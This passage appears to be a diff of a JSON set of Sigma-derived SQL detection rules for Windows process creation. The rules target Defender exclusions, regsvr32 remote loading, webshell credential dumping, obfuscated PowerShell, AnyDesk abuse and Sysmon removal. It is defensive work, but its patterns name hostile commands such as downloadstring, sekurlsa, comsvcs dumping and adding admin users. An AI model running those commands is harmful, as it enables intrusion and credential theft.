"Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218.010" ], "falsepositives": [ - "Possible Admin Activity", - "Other Cmdlets that may use the same parameters" + "FQDNs that start with a number" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Add-MpPreference %' ESCAPE '\\' OR CommandLine LIKE '%Set-MpPreference %' ESCAPE '\\') AND (CommandLine LIKE '% -ExclusionPath %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionExtension %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionProcess %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionIpAddress %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND (CommandLine LIKE '% /i:http://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://9%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://9%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_defender_exclusion.yml" + "filename": "proc_creation_win_regsvr32_http_pattern.yml" }, { - "title": "Outlook EnableUnsafeClientMailRules Setting Enabled", - "id": 
"55f0a3a1-846e-40eb-8273-677371b8d912", - "status": "test", - "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "title": "Unusual Child Process of dns.exe", + "id": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", + "status": "experimental", + "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "attack.t1059", - "attack.t1202" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" + "filename": "proc_creation_win_dns_susp_child_process.yml" }, { - "title": "Suspicious Registry Modification From ADS Via Regini.EXE", - "id": "77946e79-97f1-45a2-84b4-f37b5c0d8682", + "title": "PUA- IOX Tunneling Tool Execution", + "id": "d7654f02-e04b-4934-9838-65c46f187ebc", "status": "experimental", - "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", - "author": "Eli Salem, Sander Wiebing, oscd.community", + "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.command_and_control", 
+ "attack.t1090" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND CommandLine REGEXP ':[^ \\\\]')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\iox.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe fwd -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe fwd -r %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -r %' ESCAPE '\\') OR (Hashes LIKE '%MD5=9DB2D314DD3F704A02051EF5EA210993%' ESCAPE '\\' OR Hashes LIKE '%SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD%' ESCAPE '\\' OR Hashes LIKE '%SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731%' ESCAPE '\\') OR md5 = '9db2d314dd3f704a02051ef5ea210993' OR sha1 = '039130337e28a6623ecf9a0a3da7d92c5964d8dd' OR sha256 = 'c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731'))" ], - "filename": "proc_creation_win_regini_ads.yml" + "filename": "proc_creation_win_pua_iox.yml" }, { - "title": "Sysprep on AppData Folder", - "id": "d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e", - "status": "test", - "description": "Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)", + "title": "MERCURY APT Activity", + "id": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", + "status": "experimental", + "description": "Detects suspicious command line patterns seen being used by MERCURY APT", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1059.001", + "attack.g0069" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 
'Security' AND NewProcessName LIKE '%\\\\sysprep.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-exec bypass -w 1 -enc%' ESCAPE '\\' AND CommandLine LIKE '%UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysprep_appdata.yml" + "filename": "proc_creation_win_apt_mercury.yml" }, { - "title": "UAC Bypass Using DismHost", - "id": "853e74f9-9392-4935-ad3b-2e8c040dae86", + "title": "Custom Class Execution via Xwizard", + "id": "53d4bb30-3f36-4e8a-b078-69d36c4a79ff", "status": "test", - "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\DismHost.exe%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND CommandLine REGEXP '\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\\}')" ], - "filename": "proc_creation_win_uac_bypass_dismhost.yml" + "filename": "proc_creation_win_lolbin_class_exec_xwizard.yml" }, { - "title": "Service Security Descriptor Tampering Via Sc.EXE", - "id": 
"98c5aeef-32d5-492f-b174-64a691896d25", + "title": "Webshell Hacking Activity Patterns", + "id": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", "status": "experimental", - "description": "Detection of sc.exe utility adding a new service with special permission which hides that service.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND CommandLine LIKE '%sdset%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE 
'%comsvcs%' ESCAPE '\\') OR (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\' AND CommandLine LIKE '% -m%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% user %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% localgroup %' ESCAPE '\\' AND CommandLine LIKE '% administrators %' ESCAPE '\\' AND CommandLine LIKE '%/add%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\adfind.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Nanodump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '%reg save %' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% sekurlsa%' ESCAPE '\\' OR CommandLine LIKE '%.dmp full%' ESCAPE '\\' OR CommandLine LIKE '%process call create%' ESCAPE '\\' OR CommandLine LIKE '%whoami /priv%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_sdset_modification.yml" + "filename": "proc_creation_win_webshell_hacking.yml" }, { - "title": "Suspicious Execution Of PDQDeployRunner", - "id": "12b8e9f5-96b2-41e1-9a42-8c6779a5c184", - "status": "experimental", - "description": "Detects suspicious execution of \"PDQDeployRunner\" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": 
"Remote Access Tool - AnyDesk Silent Installation", + "id": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", + "status": "test", + "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", + "author": "Ján Trenčanský", "tags": [ - "attack.execution" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate use of the PDQDeploy tool to execute these commands" + "Legitimate deployment of AnyDesk" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%PDQDeployRunner-%' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\') OR (CommandLine LIKE '%iex %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%http%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -encodedcommand %' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE 
'\\' OR CommandLine LIKE '% -w hidden%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%--install%' ESCAPE '\\' AND CommandLine LIKE '%--start-with-win%' ESCAPE '\\' AND CommandLine LIKE '%--silent%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pdqdeploy_runner_susp_children.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_silent_install.yml" }, { - "title": "Use of Adplus.exe", - "id": "2f869d59-7f6a-4931-992c-cce556ff2d53", + "title": "Potential DLL File Download Via PowerShell Invoke-WebRequest", + "id": "0f0450f3-8b47-441e-a31b-15a91dc243e2", "status": "experimental", - "description": "The \"AdPlus.exe\" binary that is part of the Windows SDK can be used as a lolbin to dump process memory and execute arbitrary commands", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1003.001" - ], + "description": "Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet", + "author": "Florian Roth (Nextron Systems), Hieu Tran", "falsepositives": [ - "Legitimate usage of Adplus" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\adplus.exe' ESCAPE '\\' OR OriginalFileName = 'Adplus.exe') AND (CommandLine LIKE '% -hang %' ESCAPE '\\' OR CommandLine LIKE '% -pn %' ESCAPE '\\' OR CommandLine LIKE '% -pmn %' ESCAPE '\\' OR CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% -po %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -sc %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%IWR %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%OutFile%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')" ], - 
"filename": "proc_creation_win_lolbin_adplus.yml" + "filename": "proc_creation_win_powershell_download_dll.yml" }, { - "title": "Execution in Webserver Root Folder", - "id": "35efb964-e6a5-47ad-bbcd-19661854018d", + "title": "Suspicious HWP Sub Processes", + "id": "023394c4-29d5-46ab-92b8-6a534c6f447b", "status": "test", - "description": "Detects a suspicious program execution in a web service root folder (filter out false positives)", + "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.initial_access", + "attack.t1566.001", + "attack.execution", + "attack.t1203", + "attack.t1059.003", + "attack.g0032" ], "falsepositives": [ - "Various applications", - "Tools that include ping or nslookup command invocations" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wwwroot\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmpub\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\htdocs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%bin\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Tools\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SMSComponent\\\\%' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Hwp.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\gbb.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_execution_path_webserver.yml" + "filename": "proc_creation_win_hwp_exploits.yml" }, { - "title": "Potential PowerShell Obfuscation Via Reversed Commands", - "id": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", + "title": "Uninstall Sysinternals Sysmon", + "id": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", "status": "test", - "description": "Detects the 
presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "description": "Detects the removal of Sysmon, which could be a potential attempt at defense evasion", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Legitimate administrators might use this command to remove Sysmon for debugging purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%hctac%' ESCAPE '\\' OR CommandLine LIKE '%kaerb%' ESCAPE '\\' OR CommandLine LIKE '%dnammoc%' ESCAPE '\\' OR CommandLine LIKE '%ekovn%' ESCAPE '\\' OR CommandLine LIKE '%eliFd%' ESCAPE '\\' OR CommandLine LIKE '%rahc%' ESCAPE '\\' OR CommandLine LIKE '%etirw%' ESCAPE '\\' OR CommandLine LIKE '%golon%' ESCAPE '\\' OR CommandLine LIKE '%tninon%' ESCAPE '\\' OR CommandLine LIKE '%eddih%' ESCAPE '\\' OR CommandLine LIKE '%tpircS%' ESCAPE '\\' OR CommandLine LIKE '%ssecorp%' ESCAPE '\\' OR CommandLine LIKE '%llehsrewop%' ESCAPE '\\' OR CommandLine LIKE '%esnopser%' ESCAPE '\\' OR CommandLine LIKE '%daolnwod%' ESCAPE '\\' OR CommandLine LIKE '%tneilCbeW%' ESCAPE '\\' OR CommandLine LIKE '%tneilc%' ESCAPE '\\' OR CommandLine LIKE '%ptth%' ESCAPE '\\' OR CommandLine LIKE '%elifotevas%' ESCAPE '\\' OR CommandLine LIKE '%46esab%' ESCAPE '\\' OR CommandLine LIKE '%htaPpmeTteG%' ESCAPE '\\' OR CommandLine LIKE '%tcejbO%' ESCAPE '\\' OR CommandLine LIKE '%maerts%' ESCAPE '\\' OR CommandLine LIKE '%hcaerof%' ESCAPE '\\' OR CommandLine LIKE '%retupmoc%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 
'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\' AND CommandLine LIKE '%rahc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-u%' ESCAPE '\\' OR CommandLine LIKE '%/u%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml" + "filename": "proc_creation_win_sysinternals_sysmon_uninstall.yml" }, { - "title": "Process Creation Using Sysnative Folder", - "id": "3c1b5fb0-c72f-45ba-abd1-4d4c353144ab", - "status": "experimental", - "description": "Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)", - "author": "Max Altgelt (Nextron Systems)", + "title": "Suspicious Extrac32 Alternate Data Stream Execution", + "id": "4b13db67-0c45-40f1-aba8-66a1a7198a1e", + "status": "test", + "description": "Extract data from cab file and hide it in an alternate data stream", + "author": "frack113", "tags": [ - "attack.t1055" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE 'C:\\\\Windows\\\\Sysnative\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%extrac32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND CommandLine REGEXP ':[^\\\\]')" ], - "filename": "proc_creation_win_susp_sysnative.yml" + "filename": "proc_creation_win_lolbin_extrac32_ads.yml" }, { - "title": "UNC2452 PowerShell Pattern", - "id": "b7155193-8a81-4d8f-805d-88de864ca50c", - "status": "test", - "description": "Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports", 
- "author": "Florian Roth (Nextron Systems)", + "title": "Remote Access Tool - AnyDesk Piped Password Via CLI", + "id": "b1377339-fda6-477a-b455-ac0923f9ec2c", + "status": "experimental", + "description": "Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.t1047" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unlikely" + "Legitimate piping of the password to anydesk", + "Some FP could occur with similar tools that uses the same command line '--set-password'" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Invoke-WMIMethod win32\\_process -name create -argumentlist%' ESCAPE '\\' AND CommandLine LIKE '%rundll32 c:\\\\windows%' ESCAPE '\\') OR (CommandLine LIKE '%wmic /node:%' ESCAPE '\\' AND CommandLine LIKE '%process call create \"rundll32 c:\\\\windows%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%/c %' ESCAPE '\\' AND CommandLine LIKE '%echo %' ESCAPE '\\' AND CommandLine LIKE '%.exe --set-password%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_unc2452_ps.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml" }, { - "title": "Schtasks From Suspicious Folders", - "id": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", - "status": "experimental", - "description": "Detects scheduled task creations that have suspicious action command and folder combinations", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Via Use MSHTA", + "id": "ac20ae82-8758-4f38-958e-b44a3140ca88", + "status": "test", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ + "attack.defense_evasion", + 
"attack.t1027", "attack.execution", - "attack.t1053.005" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%mshta%' ESCAPE '\\' AND CommandLine LIKE '%vbscript:createobject%' ESCAPE '\\' AND CommandLine LIKE '%.run%' ESCAPE '\\' AND CommandLine LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "proc_creation_win_schtasks_folder_combos.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "Windows Binary Executed From WSL", - "id": "ed825c86-c009-4014-b413-b76003e33d35", + "title": "Add SafeBoot Keys Via Reg Utility", + "id": "d7662ff6-9e97-4596-a61d-9839e32dee8d", "status": "experimental", - "description": "Detects the execution of Windows binaries from within a WSL instance. This could be used to masquerade parent-child relationships", + "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. 
Often used by attacker to allow the ransomware to work in safe mode as some security products do not", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1202" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName REGEXP '[a-zA-Z]:\\\\' AND CurrentDirectory LIKE '%\\\\\\\\wsl.localhost%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\' AND (CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wsl_windows_binaries_execution.yml" + "filename": "proc_creation_win_reg_add_safeboot.yml" }, { - "title": "Potential EmpireMonkey Activity", - "id": "10152a7b-b566-438f-a33c-390b607d1c8d", + "title": "PUA - Seatbelt Execution", + "id": "38646daa-e78f-4ace-9de0-55547b2d30da", "status": "experimental", - "description": "Detects potential EmpireMonkey APT activity", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.discovery", + "attack.t1526", + "attack.t1087", + "attack.t1083" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%/e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Local\\\\Temp\\\\Errors.bat%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND 
